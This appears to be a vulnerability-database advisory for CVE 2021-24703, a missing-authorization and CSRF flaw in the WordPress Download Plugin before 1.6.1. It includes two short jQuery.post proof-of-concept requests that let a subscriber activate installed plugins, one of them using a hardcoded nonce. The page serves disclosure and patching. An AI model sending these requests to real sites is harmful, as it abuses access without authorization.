Download Plugin < 1.6.1 – Subscriber+ Arbitrary Plugin Activation | CVE 2021-24703 | Plugin Vulnerabilities

Description

The plugin does not have capability and CSRF checks in the dpwap_plugin_activate AJAX action, allowing any authenticated users, such as subscribers, to activate plugins that are already installed.

Proof of Concept

v < 1.5.9 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php" })

v < 1.6.0 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php", nonce: base64('dpwap-metagauss') })

Affects Plugins

download-plugin

Fixed in 1.6.1

References

CVE

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

4ed8296e-1306-481f-9a22-723b051122c0

Timeline

Publicly Published

2021-10-19 (about 4 years ago)

Added

2021-10-19 (about 4 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2024-03-22

Title

WooCommerce Clover Payment Gateway < 1.3.2 - Missing Authorization via callback_handler

Published

2021-04-15

Title

User Rights Access Manager < 1.0.4 - Improper Access Controls

Published

2025-07-03

Title

DocCheck Login < 1.1.6 - Unauthorized Post Access

Published

2024-01-03

Title

WP-Members Membership Plugin < 3.4.9 - Contributor+ Sensitive Information Exposure

Published

2020-07-07

Title

Adning Advertising < 1.5.6 - Unauthenticated Arbitrary File Upload/Deletion